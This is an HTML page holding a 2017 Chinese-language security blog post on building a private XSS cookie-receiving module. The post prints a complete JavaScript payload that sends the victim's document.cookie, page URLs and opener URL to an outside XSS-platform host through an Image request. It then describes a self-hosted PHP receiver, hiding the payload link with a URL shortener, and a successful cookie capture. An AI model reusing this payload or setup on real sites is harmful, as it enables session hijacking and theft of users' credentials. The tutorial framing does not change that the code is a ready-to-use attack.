<!DOCTYPE html>
<html lang="zh-Hans">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Bywalks">



    <meta name="description" content="Bywalks个人博客(www.bywalks.com)关注网络安全、信息安全、网站建设、IT行业、网络安全文章、黑客技术、网络安全技术、网络安全知识、互联网安全知识、原创网络安全博客">


    <meta name="keywords" content="Bywalks个人博客,关注网络安全,信息安全,网站建设,安全博客,web安全,网站漏洞,网络安全,网络安全技术,网络安全知识,网络安全教程">


<title>编写自己的XSS接受模块 | Bywalks&#39;s Blog - Bywalks个人博客|网络安全爱好者</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 6.0.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Bywalks&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Bywalks&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">编写自己的XSS接受模块</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Bywalks</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">December 14, 2017&nbsp;&nbsp;0:00:00</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a><span style="color: #008000;">前言</span></h2><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">看JS书籍中，看着看着就想到了XSS平台，不禁对XSS平台为什么可以接受cookie产生了思考？看了下接受cookie的代码，原来是接受的步骤是这样的。</span></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">我们在存在一个XSS漏洞的地方插入XSS代码，该XSS代码从远程载入一段Javascript。这段Javascript代码的作用就是向我们的XSS平台提交一段GET请求，这段GET请求包括浏览器的cookie（document.cookie），然后我们的XSS平台就接受GET请求，把cookie获取。</span></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">那么我们是否可以自己搭建个接受模块来接受cookie呢？毕竟用别人的平台别人是可以看到我们打到的cookie的。</span></p>
<h2 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a><span style="color: #008000;">步骤</span></h2><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">这是XSS平台获取cookie的模块，下面的几段代码就可以让我们接受从某个地方打到的cookie</span></p>
<p><img src="/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/SA1R05FFOG@SK9V7J.png"></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">可能这样看不清楚，那我们解压缩一下。</span></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">(function () &#123;</span><br><span class="line">    (new Image()).src = &#x27;http://xsspt.com/index.php?do=api&amp;id=&#123;projectId&#125;&amp;location=&#x27; + escape((function () &#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            return document.location.href</span><br><span class="line">        &#125; catch (e) &#123;</span><br><span class="line">            return &#x27;&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)()) + &#x27;&amp;toplocation=&#x27; + escape((function () &#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            return top.location.href</span><br><span class="line">        &#125; catch (e) &#123;</span><br><span class="line">            return &#x27;&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)()) + &#x27;&amp;cookie=&#x27; + escape((function () &#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            return document.cookie</span><br><span class="line">        &#125; catch (e) &#123;</span><br><span class="line">            return &#x27;&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)()) + &#x27;&amp;opener=&#x27; + escape((function () &#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            return (window.opener &amp;&amp; window.opener.location.href) ? window.opener.location.href : &#x27;&#x27;</span><br><span class="line">        &#125; catch (e) &#123;</span><br><span class="line">            return &#x27;&#x27;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)());</span><br><span class="line">&#125;)();</span><br><span class="line">if (&#x27;&#123;set.keepsession&#125;&#x27; == 1) &#123;</span><br><span class="line">    keep = new Image();</span><br><span class="line">    keep.src = &#x27;http://xsspt.com/index.php?do=keepsession&amp;id=&#123;projectId&#125;&amp;url=&#x27; + escape(document.location) + &#x27;&amp;cookie=&#x27; + escape(document.cookie)</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">这段代码等同于<code>&lt;img src=&quot;http://localhost/xss.php?cookie=(document.cookie).....&quot; /&gt;</code>，也就是一个Img标签。该Img标签可以访问远程接受cookie的地址。</span></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">那么我们在自己的服务器上加一个xss1.js和接受并处理cookie的xss.php不就行了么。</span></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';"><span style="font-family: 微软雅黑, 'Microsoft YaHei';">这里的话我图简单就本地phpstudy搭建了，反正都一样。。。</span></span></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">接受和处理cookie的xss.php</span></p>
<p><img src="/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/RTL57WPY_M5QRVGBYWCW.png"></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">发送GET请求的xss1.js</span></p>
<p><img src="/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/36TKT6D2AD@T4PREZGR3_1.png"></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">本地写一个无过滤的界面来测试是否可以用。</span></p>
<p><img src="/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/1.png"></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">view看看。src后面的网址我把缩短了。</span></p>
<p><img src="/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/2-1024x375.png"></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">百度缩短网址即可。  </span></p>
<p><img src="/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/8SBIHC0V317AKI2WFQ.png"></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">最后看看我们本地的地方是否存在这个cookie.txt</span></p>
<p><img src="/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/EM257JP0L4_QAQFHX3.png"></p>
<p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">成功打到cookie，说明成功。</span></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Bywalks</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://example.com/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/">http://example.com/2017/12/14/%E7%BC%96%E5%86%99%E8%87%AA%E5%B7%B1%E7%9A%84xss%E6%8E%A5%E5%8F%97%E6%A8%A1%E5%9D%97/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2022 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"># 网络安全</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2017/12/20/%E6%B5%85%E8%B0%88xxe/">浅谈XXE漏洞</a>
            
            
            <a class="next" rel="next" href="/2017/12/02/tomcat%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9Ecve-2017-12615/">Tomcat任意文件上传漏洞CVE-2017-12615</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Bywalks | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>